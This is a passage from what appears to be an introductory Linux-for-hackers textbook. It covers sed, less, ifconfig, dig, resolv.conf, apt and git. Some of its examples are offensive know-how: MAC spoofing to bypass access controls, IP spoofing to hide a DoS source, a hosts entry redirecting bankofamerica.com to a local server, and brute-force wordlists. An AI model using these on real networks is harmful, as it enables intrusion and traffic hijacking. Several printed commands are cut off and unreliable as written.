searching for (o) and then the term you want to replace it with (0), separated
by a slash (/). The g flag tells Linux that you want the replacement
performed globally. We then save the result to a new file named
unix_passwords2.txt.

Now, when you display this file with cat, you can see that all occurrences of
the letter o have been replaced with zero:
kali> cat /usr/share/metasploit-framework/data/wordlists/
admin
123456
12345
123456789
passw0rd
il0vey0u
princess
1234567
12345678
abc123
nic0le
daniel
babygirl
m0nkey
l0vely
If you leave out the trailing g command like this
kali> sed s/o/0//usr/share/metasploit-framework/data/word
unix_passwords2.txt

it replaces only the first instance with a zero.
Viewing Files with more and less
Although cat is a good utility for displaying files and creating small files, it
certainly has its limitations when displaying large files. When you use cat
with apache2.conf, the file scrolls through every page until it comes to the
end, which is not very practical if you want to glean any information from
it.
For working with larger files, we have two other viewing utilities: more and
less.
Controlling the Display with more
The more command displays a page of a file at a time and lets you page
down through it using the ENTER key. Open apache2.conf with the more
command:
kali> more /etc/apache2/apache2.conf
# This is the main Apache server configuration fi
# configuration directives that give the server i
# See http://httpd.apache.org/docs/2.4/ for detai
# the directives and /usr/share/doc/apache2/READM
# hints.
#

#
# Summary of how the Apache 2 configuration works
# The Apache 2 web server configuration in Debian
# upstream's suggested way to configure the web s
# default Apache2 installation attempts to make a
# virtual hosts, and extra configuration directiv
# order to make automating the changes and admini
# possible.
--snip--
--More--(2%)
Notice that more displays only the first page and then stops, telling us in the
lower-left corner how much of the file is shown (2 percent in this case). To
see additional lines or pages, press ENTER. To exit more, enter q (for quit).
Displaying and Filtering with less
The less command is very similar to more, but with additional functionality
(hence the common Linux aficionado quip “Less is more”). With less, you
can not only scroll through a file at your leisure but also filter it for terms.
Open apache2.conf with the less command:
kali> less /etc/apache2/apache2.conf
# This is the main Apache server configuration fi
# configuration directives that give the server i
# See http://httpd.apache.org/docs/2.4/ for detai

# the directives and /usr/share/doc/apache2/READM
# hints.
#
#
# Summary of how the Apache 2 configuration works
# The Apache 2 web server configuration in Debian
# upstream's suggested way to configure the web s
# default Apache2 installation attempts to make a
# virtual hosts, and extra configuration directiv
# order to make automating the changes and admini
# possible.
--snip--
Notice in the bottom left of the screen that less has highlighted the path to
the file. If you press the forward slash (/) key, less will let you search for
terms in the file. For instance, we can press / to search the apache2.conf file
for every occurrence of the term mod, as we did earlier with grep:
# Summary of how the Apache 2 configuration works
# The Apache 2 web server configuration in Debian
# upstream's suggested way to configure the web s
# default Apache2 installation attempts to make a
# virtual hosts, and extra configuration directiv
# order to make automating the changes and admini
# possible.

# It is split into several files forming the conf
# below, all located in the /etc/apache2/ directo
#
#       /etc/apache2/
#       |-- apache2.conf
#       |       `--  ports.conf
#       |-- mods-enabled
#       |       |-- *.load
#       |       `-- *.conf
#       |-- conf-enabled
#       |       `-- *.conf
#       `-- sites-enabled
#               `-- *.conf
#
This will immediately take you to the first occurrence of mod and highlight
it. You can then look for the next occurrence by entering n (for next):
# * apache2.conf is the main configuration file (
#   together by including all remaining configura
#   web server.
#
# * ports.conf is always included from the main c
#   supposed to determine listening ports for inc
#   customized anytime.
#
# * Configuration files in the mods-enabled/, con

#   directories contain particular configuration 
#   global configuration fragments, or virtual ho
#   respectively.
#
#   They are activated by symlinking available co
#   respective *-available/ counterparts. These s
#   helpers a2enmod/a2dismod, a2ensite/a2dissite a
#   their respective man pages for detailed infor
As you can see, less took you to the next occurrence of mod and highlighted
all the search terms. How convenient!
Summary
Linux has numerous ways of manipulating text, and each way comes with
its own strengths and weaknesses. We’ve touched on a few of the most
useful methods in this chapter, but I suggest you try each one and develop
your own preferences. For example, I think grep is indispensable, and I use
less widely, but you might feel differently.
Exercises
To complete the following exercises, first navigate to /usr/share/metasploit-
framework/data/wordlists. This is a directory of multiple word lists that can

be used to brute-force passwords in various password-protected devices
using Metasploit, the most popular pentesting and hacking framework.
1. Use the cat command to view the contents of the file password.lst.
2. Use the more command to display the file password.lst.
3. Use the less command to view the file password.lst.
4. Use the nl command to place line numbers on the passwords in
password.lst. There should be around 88,396 passwords.
5. Use the tail command to see the last 20 passwords in password.lst.
6. Use the cat command to display password.lst and pipe it to find all the
passwords that contain 123.
OceanofPDF.com

3
ANALYZING AND MANAGING
NETWORKS

Understanding networking is crucial for any aspiring hacker. In many
situations, you’ll be hacking something over a network, and a good hacker
needs to know how to connect to and interact with that network. For
example, you may need to connect to a computer with your internet
protocol (IP) address hidden from view, or you may need to redirect a
target’s Domain Name System (DNS) queries to your system; these kinds of
tasks are relatively simple but require a little Linux network know-how.
This chapter shows you some essential Linux tools for analyzing and
managing networks during your network-hacking adventures.
Analyzing Networks with ifconfig
The ifconfig command is one of the most basic tools for examining and
interacting with active network interfaces. You can use it to query your
active network connections by simply entering ifconfig in the terminal. Try
it yourself, and you should see output similar to the following:
kali> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> 
        inet6 fe80::248b:fe30:f040:8c2  prefixlen
        ether 00:0c:29:3d:0d:1f  txqueuelen 1000 
        RX packets 58603  bytes 3533310 (3.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame
        TX packets 364  bytes 37089 (36.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrie

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<ho
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36  bytes 2712 (2.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame
        TX packets 36  bytes 2712 (2.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrie
--snip--
wlan0: Link encap:EthernetHWaddr 00:c0:ca:3f:ee:0
The command shows some useful information about the active network
interfaces on the system. At the top of the output is the name of the first
detected interface, eth0, which is short for Ethernet0 (Linux starts counting
at 0 rather than 1). This is the first wired network connection. If there were
more wired Ethernet interfaces, they would show up in the output using the
same format (eth1, eth2, and so on).
The type of network being used (Ethernet) is listed next, followed by HWaddr
and an address. This is the globally unique address stamped on every piece
of network hardware—in this case, the network interface card (NIC)—and
is usually referred to as the media access control (MAC) address.
The second line contains information about the IP address currently
assigned to that network interface (in this case, 192.168.181.131); the Bcast, or
broadcast address, which is the address used to send information to all IP

addresses on the subnet; and finally, the network mask (netmask), which is
used to determine what part of the IP address is connected to the local
network. You’ll also find more technical information in this section of the
output, but it’s beyond the scope of this Linux networking basics chapter.
The next section of the output shows another network connection called lo,
which is short for loopback address and is sometimes called localhost. This
is a special software address that connects you to your own system.
Software and services not running on your system can’t use it. You would
use lo to test software on your system, such as your own web server. The
localhost is generally represented with the IP address 127.0.0.1.
The third connection is the interface wlan0. This appears only if you have a
wireless interface or adapter, as I do here. Note that it also displays the
MAC address of that device (HWaddr).
This information from ifconfig enables you to connect to and manipulate
your local area network (LAN) settings, an essential skill for hacking.
Network Statistics with netstat and ss
Another handy command line tool is netstat (network statistics). The netstat
tool shows us all the connections coming or going from our system, which
can help with monitoring and troubleshooting network connections. In

some cases, I have used it to find malware connecting to my system. When
you run this command
kali> netstat –a
you’ll see output like what’s shown in Figure 3-1.
Figure 3-1: The output from running netstat -a
Your system probably looks different, but you should be able to see every
connection to your system. There may be hundreds!
To display all the TCP connections, you can use the –t switch; for all the
UDP connections, you can use the –u switch; and for all the listening

connections, the –l switch.
If you are looking for a specific connection, you can pipe (see Chapter 2)
the netstat command to grep and filter for key words. If you have an Apache
web server running on your system listening for connections, you can check
by piping netstat –a to grep http, such as:
kali> netstat –a | grep http
You’ll see output as shown in Figure 3-2.
Figure 3-2: The output from running netstat -a | grep http
The ss tool can display even more information than netstat in a more
readable format, as shown in Figure 3-3.

Figure 3-3: The network connection from the ss command
When you run the ss command, you get a display of every connection to
your system with the local address and port, as well as the port on the peer
system.
Checking Wireless Network Devices with iwconfig
If you have an external USB, you can use the iwconfig command to gather
crucial information for wireless hacking, such as the adapter’s IP address,
its MAC address, what mode it’s in, and more. The information you can
glean from this command is particularly important when you’re using
wireless hacking tools like aircrack-ng.
Using the terminal, let’s take a look at some wireless devices with iwconfig:

kali> iwconfig
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not Associated Tx-Powe
--snip--
lo    no wireless extensions
eth0  no wireless extensions
The output here tells us that the only network interface with wireless
extensions is wlan0, which is what we would expect. Neither lo nor eth0 has
any wireless extensions.
For wlan0, we learn which 802.11 IEEE wireless standards our device is
capable of using: b and g, two early wireless communication standards.
Most wireless devices now include n as well, the latest standard.
We also learn the wireless extension’s mode. In this case, the mode is set to
Managed, rather than monitor or promiscuous mode. We’ll need promiscuous
mode for cracking wireless passwords.
Next, we can see that the wireless adapter is not connected (Not Associated)
to an access point (AP) and that its power is 20 dBm, which represents the
strength of signal. We’ll spend more time with this information in Chapter
14.

Changing Your Network Information
Being able to change your IP address and other network information is a
useful skill because it will help you access other networks while appearing
to be a trusted device on those networks. For example, in a denial-of-
service (DoS) attack, you can spoof your IP address so that that the attack
appears to come from another source, which will cover your tracks during
forensic analysis. This is a relatively simple task in Linux, and it’s done
with the ifconfig command.
Assigning a New IP Address
To change your IP address, enter ifconfig followed by the interface you want
to reassign and the new IP address you want assigned to that interface. For
example, to assign the IP address 192.168.181.115 to interface eth0, you
would enter the following:
kali> sudo ifconfig eth0 192.168.181.115
kali>
Note that you preface this command with sudo, as it requires root privileges.
When you do this correctly, Linux will simply return the command prompt
and say nothing. This is a good thing!

When you again check your network connections with ifconfig, you should
see that your IP address has changed to the new IP address you just
assigned.
Changing Your Network Mask and Broadcast Address
You can also change your network mask (netmask) and broadcast address
with the ifconfig command. For instance, if you want to assign that same
eth0 interface with a netmask of 255.255.0.0 and a broadcast address of
192.168.1.255, you would enter the following:
kali> sudo ifconfig eth0 192.168.181.115 netmask 255.255.
kali>
Once again, if you’ve done everything correctly, Linux responds with a new
command prompt. Now enter ifconfig again to verify that each of the
parameters has been changed accordingly.
Spoofing Your MAC Address
You can use ifconfig to change your MAC address (or HWaddr). The MAC
address is globally unique and is often used as a security measure to keep
hackers out of networks, or sometimes to trace them. Changing your MAC
address to a different value is easy to do and neutralizes those security

measures. Thus, it’s a very useful technique for bypassing network access
controls.
To spoof your MAC address, simply use the ifconfig command’s down option
to take down the interface (eth0 in this case). Then enter the ifconfig
command followed by the interface name (hw for hardware and ether for
Ethernet) and the new spoofed MAC address. Finally, bring the interface
back up with the up option to make the change take place. Here’s an
example:
kali> sudo ifconfig eth0 down
kali> sudo ifconfig eth0 hw ether 00:11:22:33:44:55
kali> sudo ifconfig eth0 up
Now, when you check your settings with ifconfig, you should see that HWaddr
has changed to your spoofed MAC address!
Assigning New IP Addresses from the DHCP Server
Linux has a Dynamic Host Configuration Protocol (DHCP) server that runs
a daemon (a process that runs in the background) called dhcpd, or the dhcp
daemon. The DHCP server assigns IP addresses to all the systems on the
subnet and keeps logfiles of which IP address is allocated to which machine
at any one time. This makes it a great resource for forensic analysts hoping

to trace hackers after an attack. For that reason, it’s useful to understand
how the DHCP server works.
Usually, to connect to the internet from a LAN, you must have a DHCP-
assigned IP. Therefore, after setting a static IP address, you must also get a
new DHCP-assigned IP address. To do this, you can always reboot your
system, but I’ll show you how to retrieve a new DHCP without having to
shut your system down and restart it.
To request an IP address from DHCP, simply call the DHCP server with the
command dhclient followed by the interface to which you want the address
assigned. Different Linux distributions use different DHCP clients, but Kali
is built on Debian, which uses dhclient, so you can assign a new address like
this:
kali> sudo dhclient eth0
The dhclient command sends a DHCPDISCOVER request from the network
interface specified (here, eth0). It then receives an offer (DHCPOFFER) from the
DHCP server (192.168.181.131 in this case) and confirms the IP assignment
to the DHCP server with a dhcp request:
kali> ifconfig
eth0: Linkencap:EthernetHWaddr 00:0c:29:ba:82:0f

inet addr:192.168.181.131 Bcast:192.168.181.131 M
Depending on the configuration of the DHCP server, the IP address
assigned in each case might be different.
Now when you enter ifconfig, you should see that the DHCP server has
assigned a new IP address, a new broadcast address, and a new netmask to
your eth0 network interface.
Manipulating the Domain Name System
Hackers can find a treasure trove of information on a target in its DNS
(Domain Name System). DNS is a critical component of the internet, and
although it’s designed to translate domain names to IP addresses, a hacker
can use it to garner information on the target.
Examining DNS with dig
DNS is the service that translates a domain name like hackers-arise.com to
the appropriate IP address; that way, your system knows how to get to it.
Without DNS, we would all have to remember thousands of IP addresses
for our favorite websites—no small task, even for a savant.
One of the most useful commands for the aspiring hacker is dig, which
offers a way to gather DNS information about a target domain. The stored

DNS information can be a key piece of early reconnaissance to obtain
before attacking. This information could include the IP address of the
target’s nameserver (the server that translates the target’s name to an IP
address), the target’s email server, and potentially any subdomains and IP
addresses.
For instance, enter dig hackers-arise.com and add the ns option (short for
nameserver):
kali> dig hackers-arise.com ns
--snip--
;; QUESTION SECTION:
;hackers-arise.com.    IN   NS
;; ANSWER SECTION:
hackers-arise.com.  5  IN   NS   ns7.wixdns.net.
hackers-arise.com.  5  IN   NS   ns6.wixdns.net.
;; ADDITIONAL SECTION:
ns6.wixdns.net.     5  IN   A   216.239.32.100
--snip--
The nameserver for hackers-arise.com is displayed in the ANSWER SECTION.
Also note in the ADDITIONAL SECTION that this dig query reveals the IP address

(216.239.32.100) of the DNS server serving hackers-arise.com. This
section may look slightly different on your system or may not show at all.
You can also use the dig command to get information on email servers
connected to a domain by adding the mx option (mx is short for mail exchange
server). This information is critical for attacks on email systems. For
example, information on the hackers-arise.com email servers is shown in
the AUTHORITY SECTION:
kali> dig hackers-arise.com mx
--snip--
;; QUESTION SECTION:
;hackers-arise.com.    IN   MX
;; AUTHORITY SECTION:
hackers-arise.com.  5  IN   SOA   ns6.wixdns.net
support.wix.com 2016052216 10800 3600 604 800 360
--snip--
The most common Linux DNS server is the Berkeley Internet Name
Domain (BIND). In some cases, Linux users will refer to DNS as BIND,
but don’t be confused: DNS and BIND both map individual domain names
to IP addresses.
Changing Your DNS Server

In some cases, you may want to use another DNS server. To do so, you’ll
edit a plaintext file named /etc/resolv.conf on the system. Open that file in a
text editor such as mousepad. Then, on your command line, enter the
precise name of your editor followed by the location of the file and the
filename:
kali> sudo mousepad /etc/resolv.conf
This example will open the resolv.conf file in the /etc directory in the
specified text editor, mousepad. The file should look something like Figure
3-4.
Figure 3-4: A typical resolv.conf file in a text editor
As you can see on line 3, my nameserver is set to a local DNS server at
192.168.1.1. That works fine, but if I want to replace that DNS server with,
say, Google’s public DNS server at 8.8.8.8, I could place the following line
in the /etc/resolv.conf file to specify the nameserver:

nameserver 8.8.8.8
Then I would just need to save the file. However, you can also achieve the
same result exclusively from the command line by entering the following:
kali> sudo echo "nameserver 8.8.8.8"> /etc/resolv.conf
This command echoes the string nameserver 8.8.8.8 and redirects it (>) to the
file /etc/resolv.conf, replacing the current content. Your /etc/resolv.conf file
should now look like Figure 3-5.
Figure 3-5: Changing the resolv.conf file to specify Google’s DNS server
If you open the /etc/resolv.conf file now, you should see that it points the
DNS requests to Google’s DNS server rather than your local DNS server.
Your system will now go out to the Google public DNS server to resolve
domain names to IP addresses. This can mean that domain names take a
little longer to resolve (probably milliseconds). Therefore, to maintain

speed but keep the option of using a public server, you might want to retain
the local DNS server in the resolv.conf file and follow it with a public DNS
server. The operating system queries each DNS server listed in the order it
appears in /etc/resolv.conf, so the system will only refer to the public DNS
server if the domain name can’t be found in the local DNS server.
NOTE
If you’re using a DHCP address and the DHCP server
provides a DNS setting, the DHCP server will replace the
contents of the file when it renews the DHCP address.
Mapping Your Own IP Addresses
A special file on your system called the hosts file also performs domain
name–IP address translation. The hosts file is located at /etc/hosts, and you
can use it to specify your own IP address–domain name mapping. In other
words, you can determine which IP address your browser goes to when you
enter www.microsoft.com (or any other domain) into the browser, rather
than letting the DNS server decide. As a hacker, this can be useful for
hijacking a TCP connection on your local area network to direct traffic to a
malicious web server with a tool such as dnsspoof.
From the command line, enter the following command (substitute your
preferred text editor for mousepad):

kali> sudo mousepad /etc/hosts
You should now see your hosts file, which will look something like Figure
3-6.
Figure 3-6: A default Kali hosts file
By default, the hosts file contains only a mapping for your localhost, at
127.0.0.1 and your system’s hostname (in this case, Kali, at 127.0.1.1). But
you can add any IP address mapped to any domain you’d like. As an
example of how this might be used, you could map
www.bankofamerica.com to your local website, at 192.168.181.131:
127.0.0.1       localhost
127.0.1.1       kali
192.168.181.131 bankofamerica.com
# The following lines are desirable for IPv6 capa
::1     localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Make certain you press TAB between the IP address and the domain key, not
the spacebar.
As you get more involved in your hacking endeavors and learn about tools
like dnsspoof and Ettercap, you’ll be able to use the hosts file to direct any
traffic on your LAN that visits www.bankofamerica.com to your web server
at 192.168.181.131.
Pretty easy, right?
Summary
Any hacker needs some basic Linux networking skills to connect, analyze,
and manage networks. As you progress, these skills will become more and
more useful for doing reconnaissance, spoofing, and connecting to target
systems.
Exercises
1. Find information on your active network interfaces.
2. Change the IP address on eth0 to 192.168.1.1.
3. Change your hardware address on eth0.

4. Check whether you have any available wireless interfaces active.
5. Reset your IP address to a DHCP-assigned address.
6. Find the nameserver and email server of your favorite website.
7. Add Google’s DNS server to your /etc/resolv.conf file so your system
refers to that server when it can’t resolve a domain name query with your
assigned address.
OceanofPDF.com

4
ADDING AND REMOVING
SOFTWARE

One of the most fundamental tasks in Linux—or any operating system—is
adding and removing software. You’ll often need to install software that
didn’t come with your distribution or remove unwanted software so it
doesn’t take up hard drive space.
Some software requires other software to run, and you’ll sometimes find
that you can download everything you need at once in a software package,
which is a group of files—typically libraries and other dependencies—that
you need for a piece of software to run successfully. When you install a
package, all the files within it are installed together, along with a script to
make loading the software simpler.
In this chapter, we examine three key methods for adding new software
using the apt package manager, GUI-based installation managers, and git.
Using apt to Handle Software
In Debian-based Linux distributions, which include Kali and Ubuntu, the
default software manager is the Advanced Packaging Tool, or apt, whose
primary command is apt. In its simplest and most common form, you can
use apt to download and install new software packages, but you can also
update and upgrade software with it.
Searching for a Package

Before downloading a software package, you can check whether the
package you need is available from your repository, which is a place where
your operating system stores information. The apt tool has a search function
that can check whether the package is available. The syntax is
straightforward:
sudo apt search keyword
Note that we use the apt command to search the apt cache, or the place it
stores the package names. If you were searching for the uncomplicated
firewall (ufw), the simple but powerful Linux firewall to protect your
network or system, for example, you would enter the following command:
kali> sudo apt search ufw
gufw/kali-rolling,kali-rolling 24.04.0-2 all
  graphical user interface for ufw
libqt6protobufwellknowntypes6/kali-rolling 6.7.2-
  Qt 6 gRPC protocol buffers Well Known types lib
librust-io-close-dev/kali-rolling 0.3.7-1+b3 amd6
  Extension trait for safely dropping I/O writers
  BufWriter - Rust source code
plasma-firewall/kali-rolling 6.2.4-1 amd64
  Plasma configuration module for firewalls

ufw/kali-rolling,kali-rolling 0.36.2-8 all
  program for managing a Netfilter firewall
Numerous files have the keyword ufw in them, but at the end of the output,
we see ufw...program for managing a Netfilter firewall. That’s what we are
looking for!
Adding Software
Now that you know the ufw package exists in your repository, you can use
apt to download the software.
To install a piece of software from your operating system’s default
repository in the terminal, use the apt command, followed by the keyword
install and then the name of the package you want to install. The syntax
looks like this:
sudo apt install packagename
Let’s try this out by installing ufw on your system:
kali> sudo apt install ufw
[sudo] password for kali:
Reading package lists... Done

Building dependency tree... Done
Reading state information... Done
Suggested packages:
  rsyslog
The following NEW packages will be installed:
  ufw
The output tells you what is being installed. If everything looks correct, go
ahead and enter y when prompted, and your software installation will
proceed.
Removing Software
When removing software, use apt with the remove option, followed by the
name of the software to remove:
kali> sudo apt remove ufw
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages will be REMOVED:
  ufw
0 upgraded, 0 newly installed, 1 to remove and 15
After this operation, 853 kB disk space will be f
Do you want to continue? [Y/n]

Again, you’ll see the tasks being done in real time and you will be asked
whether you want to continue. You can enter y to uninstall, but you might
want to keep ufw since we’ll be using it again. The remove command doesn’t
remove the configuration files, which means you can reinstall the same
package in the future without reconfiguring.
If you do want to remove the configuration files at the same time as the
package, you can use the purge option:
kali> sudo apt purge ufw
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages will be REMOVED:
  ufw*
0 upgraded, 0 newly installed, 1 to remove and 15
After this operation, 0 B of additional disk spac
Do you want to continue? [Y/n]
Simply enter y at the prompt to continue the purge of the software package
and the configuration files.
You may have noticed the line The following packages were automatically
installed and are no longer required in the output. To keep things small and
modular, many Linux packages are broken into software units that many

different programs might use. When you installed ufw, you installed several
dependencies or libraries with it that ufw requires in order to run. Now that
you’re removing ufw, those other libraries or dependencies are no longer
required, so they are removed, too.
Updating Packages
Software repositories will be periodically updated with new software or
new versions of existing software. These updates don’t reach you
automatically, so you have to request them in order to apply these updates
to your own system. Updating isn’t the same as upgrading: updating simply
updates the list of packages available for download from the repository,
whereas upgrading upgrades the package to the latest version in the
repository.
You can update your individual system by entering the apt command
followed by the keyword update. This will search through all the packages
on your system and check whether updates are available. If so, the updates
are downloaded.
kali> sudo apt update
[sudo] password for kali:
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-r
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-r
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-r
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-r

Fetched 15.2 MB in 1min 4s (236 kB/s)
Reading package lists... Done
The list of available software in the repository on your system will be
updated. If the update is successful, your terminal will state Reading package
lists... Done. Note that the name of the repository and the values (time, size,
and so on) might be different on your system.
Upgrading Packages
To upgrade the existing packages on your system, use apt upgrade. Because
upgrading your packages may make changes to your software, you must be
logged in as root entering apt upgrade. This command will upgrade every
package on your system that apt knows about, meaning only those stored in
the repository. Upgrading can be time-consuming, so you might not be able
to use your system for a while.
kali> sudo apt upgrade
[sudo] password for kali:
Reading package lists... Done
Building dependency tree... Done
Calculating upgrade... Done
The following packages were automatically install
--snip--
The following packages will be upgraded:

--snip--
1101 upgraded, 0 newly installed, 0 to remove and
Need to get 827 MB of archives.
After this operation, 408 MB disk space will be f
Do you want to continue? [Y/n]
You should see in the output that your system estimates the amount of hard
drive space necessary for the software package. Go ahead and enter y if you
want to continue and have enough hard drive space for the upgrade.
Adding Repositories to Your sources.list File
The servers that hold the software for particular distributions of Linux are
known as repositories. Nearly every distribution has its own repositories of
software—developed and configured for that distribution—that might not
work well, or at all, with other distributions. Although these repositories
often contain the same or similar software, they aren’t identical, and they
sometimes have different versions of the same software or entirely different
software.
You will, of course, be using the Kali repository, which has a large amount
of security and hacking software. But because Kali specializes in security
and hacking, it doesn’t include some specialty software and tools or even
some run-of-the-mill software. It’s worth adding a backup repository or two

that your system can search through in case it doesn’t find specific software
in the Kali repository.
The repositories your system will search for software are stored in the
sources.list file, and you can alter this file to define from which repositories
you want to download software. I often add the Ubuntu repositories after
the Kali repositories in my sources.list file; that way, when I request to
download a new software package, if it isn’t in the Kali repository, my
system may find it in the Ubuntu repository.
You can find the sources.list file at /etc/apt/sources.list and open it with any
text editor. I’ll again be using mousepad. To open the sources.list file, enter
the following into your terminal, replacing mousepad with the name of your
editor:
kali> sudo mousepad /etc/apt/sources.list
After entering this command, you should see a window like the one in
Figure 4-1, with a list of Kali’s default repositories.

Figure 4-1: Kali’s default repositories in sources.list
Many Linux distributions divide repositories into separate categories. For
instance, Debian breaks out its repository categories as follows:
main Contains supported open source software
universe Contains community-maintained open source software
multiverse Contains software restricted by copyright or other legal
issues
restricted Contains proprietary device drivers
backports Contains packages from later releases
I don’t recommend using testing, experimental, or unstable repositories in
your sources.list because they can download problematic software to your
system. Software that isn’t fully tested might break your system.
When you ask to download a new software package, the system looks
through the repositories listed in sources.list and selects the most recent
version of the desired package. Check first that the repository is compatible

for your system. Kali is built on Debian, like Ubuntu or Parrot, so these
repositories work pretty well with each of these systems.
To add a repository, just edit the sources.list file by adding the name of the
repository to the list and then save the file. Say, for example, you want to
install the iridium satellite hacking software (gr-iridium) on Kali. No apt
package for gr-iridium is available as part of the default Kali sources, but a
quick search online shows that the fine folks at Ubuntu have one in their
repository. If you add their repository to the sources, you can then install gr-
iridium by adding the Ubuntu repository to your sources.list file. (Ubuntu is
the most widely used desktop Linux.) At the time of writing, you would
need to add the following repository locations to sources.list in order to add
the necessary repositories:
deb http://us.archive.ubuntu.com/ubuntu/saucy uni
deb-src http://us.archive.ubuntu.com/ubuntu/saucy
deb http://us.archive.ubuntu.com/ubuntu/saucy-upd
deb-src http://us.archive.ubuntu.com/ubuntu/saucy
As you can see, we have added the Ubuntu repositories to our sources.list
file, making them available to our system.
Using a GUI-Based Installer

Newer versions of Kali no longer include a GUI-based software installation
tool, but you can always install one with the apt command. The two most
common GUI-based installation tools are Synaptic and Gdebi. Let’s install
Synaptic and use it to install our ufw package:
kali> sudo apt install synaptic
[sudo] password for kali
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
--snip--
Processing triggers for kali -menu ...
Once you have Synaptic installed, you can start it from the Kali menu by
going to Settings ▶  Synaptic Package Manager, which should open a
window like the one in Figure 4-2.

Figure 4-2: The Synaptic Package Manager interface
Now you can search for the package you’re looking for. Simply click the
Search tab to open a search window. Because you are looking for ufw again,
enter ufw into the search window and click Search. Scroll down the search
results to find the package you’re looking for. Check the box next to ufw
and then click the Apply tab, as shown in Figure 4-3.

Figure 4-3: Searching for ufw
Synaptic will now download and install ufw from the repository along with
any necessary dependencies, as shown in Figure 4-4.

Figure 4-4: Downloading ufw from the Synaptic Package Manager
Installing Software with git
Sometimes the software you want isn’t available in any of the repositories
—especially if it’s brand new—but it may be available on GitHub
(https://www.github.com), a site that allows developers to share their
software with others to download, use, and provide feedback. For instance,
if you want to install cameradar, an IP camera hacking tool (this is one of
the tools we used to hack cameras in Ukraine to spy on Russian activities),
but can’t find it in the Kali repository, you can search GitHub for the

software by entering cameradar g into the search bar. If it exists on
GitHub, you should see the repository for it in the search results.
Once you’ve found the software on GitHub, you can install it from the
terminal by entering the git clone command followed by its GitHub URL.
For instance, cameradar is located at
https://github.com/Ullaakut/cameradar.git. To clone it into your system,
enter the following command:
kali> git clone https://github.com/Ullaakut/cameradar
Cloning into 'cameradar'...
remote: Enumerating objects: 2661, done.
remote: Counting objects: 100% (81/81), done.
remote: Compressing objects: 100% (53/53), done.
remote: Total 2661 (delta 32), reused 53 (delta 2
Receiving objects: 100% (2661/2661), 36.35 MiB | 
Resolving deltas: 100% (1042/1042), done.
The git clone command copies all the data and files from that location onto
your system. You can check to see that they’ve been successfully
downloaded by using the long listing command ls –l on the target directory,
like so:
kali> ls -l

If you’ve successfully cloned cameradar to your system, you should see
something like the following output:
total 80
drwxr-xr-x 7 kali kali  4096 Jan 10 22:19 camerad
drwxr-xr-x 2 kali kali  4096 Dec  5 11:17 Desktop
drwxr-xr-x 2 kali kali  4096 Dec  5 11:17 Documen
drwxr-xr-x 2 kali kali  4096 Dec  5 11:17 Downloa
drwxr-xr-x 2 kali kali  4096 Dec  5 11:17 Music
--snip--
The output shows that cameradar has been successfully cloned to the
system, and a new directory named cameradar has been created for its files.
Summary
In this chapter, you learned a few of the many ways to download and install
new software on your Linux system. Software package managers (like apt),
GUI-based installers, and git clones are the most common and crucial
methods for an aspiring hacker to know. You’ll soon find yourself becoming
familiar with each of them.
Exercises
1. Install a new software package from the Kali repository.

2. Remove that same software package.
3. Update your repository.
4. Upgrade your software packages.
5. Select a new piece of software from GitHub and clone it to your system.
OceanofPDF.com

5
CONTROLLING FILE AND
DIRECTORY PERMISSIONS

Not every user of a single operating system should have the same level of
access to its files and directories. Like any professional or enterprise-level
operating system, Linux has methods for securing file and directory access.
This security system allows the system administrator—the root user—or the
file owner to protect their files from unwanted access or tampering by
granting select users permissions to read, write, or execute files. For each
file and directory, we can specify the permission status for the file’s owner,
for particular groups of users, and for all other users. This is a necessity in a
multiuser, enterprise-level operating system that requires permissions. The
alternative would be quite chaotic.
In this chapter, I’ll show you how to check for and change permissions on
files and directories for select users, how to set default file and directory
permissions, and how to set special permissions. Finally, you will see how a
hacker’s understanding of permissions might help them exploit a system.
Different Types of Users
As you know, in Linux the root user is all-powerful. The root user can do
basically anything on the system. Other users on the system have more
limited capabilities and permissions and almost never have the access that
the root user has.
These other users are usually collected into groups that generally share a
similar function. In a commercial entity, these groups might consist of

teams such as finance, engineering, sales, and so on. In an IT environment,
these groups might include developers, network administrators, and
database administrators. The idea is to put people with similar needs into a
group that is granted relevant permissions; then each member of the group
inherits the group permissions. This is primarily for the ease of
administering permissions and, thus, security.
The root user is part of the root group by default. Each new user on the
system must be added to a group in order to inherit the permissions of that
group.
Granting Permissions
Each and every file must be allocated a particular permission level for the
different identities using it. The three levels of permission are as follows:
r Permission to read grants permission only to open and view a file.
w Permission to write allows users to view and edit a file.
x Permission to execute allows users to execute a file (but not
necessarily view or edit it).
In this way, the root user can grant users a level of permission depending on
what they need the files for. When a file is created, the user who created it is
typically the file’s owner, and the owning group is the user’s current group.
The owner of the file can grant various access privileges to it. Let’s look at

how to change permissions to pass ownership to individual users and to
groups.
Granting Ownership to an Individual User
To move ownership of a file to a different user so that they have the ability
to control permissions, we can use the chown (or change owner) command:
kali> chown bob/tmp/bobsfile
Here, we give the command, the name of the user we are giving ownership
to, and then the location and name of the relevant file. This command grants
the user account for Bob ownership of bobsfile.
Granting Ownership to a Group
To transfer ownership of a file from one group to another, we can use the
chgrp (or change group) command.
Hackers are often more likely to work alone than in groups, but it’s not
unheard of for several hackers or pentesters to work together on a project,
and in that case, using groups is necessary. For instance, you might have a
group of pentesters and a group of security team members working on the
same project. The pentesters in this example are the root group, meaning
they have all permissions and access. The root group needs access to the

hacking tools, whereas the security folks only need access to defensive
tools such as an intrusion detection system (IDS).
Let’s say the root group downloads and installs a defensive program named
newIDS; they will then need to transfer ownership to the security group so
the security group can use it at will. To do so, the root group can enter the
following command:
kali> sudo chgrp security newIDS
This command passes the security group ownership of newIDS. Now you
need to know how to check whether these allocations have worked. You’ll
